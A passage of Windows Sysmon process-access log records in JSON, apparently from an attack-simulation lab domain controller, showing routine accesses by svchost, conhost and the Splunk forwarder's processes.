{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21DF-5F25-0000-0010F62C0A00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21DF-5F25-0000-0010F62C0A00}","TargetProcessId":"2252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6571,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.539\r\nSourceProcessGUID: {41C8662E-21DF-5F25-0000-0010F62C0A00}\r\nSourceProcessId: 2252\r\nSourceThreadId: 3664\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program 